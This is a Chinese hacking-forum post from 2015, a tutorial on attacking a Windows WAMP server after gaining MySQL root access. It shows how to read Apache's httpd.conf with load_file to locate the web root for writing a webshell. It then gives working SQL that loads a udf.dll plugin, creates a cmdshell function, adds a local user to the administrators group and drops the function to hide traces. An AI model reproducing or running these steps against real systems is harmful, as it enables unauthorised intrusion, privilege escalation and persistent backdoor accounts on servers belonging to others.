搜索
查看: 284|回复: 0

关于得到mysql root权限找不到路径写webshell的解决方法

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-12-6 14:32:26 | 显示全部楼层 |阅读模式
这里主要方法有好几种,我就说说常用的两种

一种是:通过另外的途径获得网站根目录
一种是:通过phpmyadmin win下提权方法



通过另外的途径获得网站根目录
案例:通过网站备份获取到root密码,但是得不到路径。
这里我们的思路就有千方百计的获得网站根目录路径,例如:phpinfo.php phpmyadmin爆路径,cms爆路径,kindeditor爆路径漏洞等,或者注入文件报错?...
当然,我们获取到root权限并连接上找不到路径,我一般开始都是使用:select @@datadir 这个函数获取到mysql安装的路径
先看服务器基本信息

select @@datadir

这里看到:这台服务器用的wamp  mysql5.520版本的。
那么我现在的思路就是获取到网站的根目录.通过前面信息,我们可以通过寻找阿帕奇的配置文件得到网站路径。
通过前面的mysql安装路径:d:\wamp\bin\mysql\mysql5.5.20\data\,
看前面的信息: Apache/2.2.21 (Win32) PHP/5.3.10
我们可以这样猜想Apache的路径:“d:\wamp\bin\Apache\Apache 2.2.21\conf\httpd.conf”  
SELECT load_file( 'd:/wamp/bin/Apache/Apache 2.2.21/conf/httpd.conf' )

读取不到,这里去掉空格看看?
SELECT load_file( 'd:/wamp/bin/Apache/Apache2.2.21/conf/httpd.conf' )

通过阿帕奇配置文件找到网站路径:d:\wamp\www
其实这里只是为了找到这个网站路径铺路,我们前面可以这样子想网站根目录是"d:\wamp\wwwroot\" "d:\wamp\www" "d:\wamp\www\域名" "d:\wamp\域名"等。

通过phpmyadmin win下提权方法
关于phpmyadmin 下提权,网上也有案例,这里我就讲讲我的方法。
关于:udf.dll提权 前提,mysql root权限   mysql udf提权 5.0以下的要导出到c:\windows\   或者c:\windows\system32目录下  mysql版本大于5.0的  要导出到*:\MYSQL\lib\plugin目录下;


第一:
select @@basedir; 查mysql路径


例如:d:\wamp\bin\mysql\mysql5.5.20\data\

第二:通过phpmyadmin导入功能导入udf.dll


改下导出的路径。
使用phpmyadmin 功能导入;
第三:这个时候就可以创建cmdshell函数了
        create function cmdshell returns string soname 'udf.dll';

        select cmdshell('net user test test123 /add');

        select cmdshell('net localgroup administrators test /add');

        drop function cmdshell; 删除函数

        delete from mysql.func where name='cmdshell'  删除函数

最后附图:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表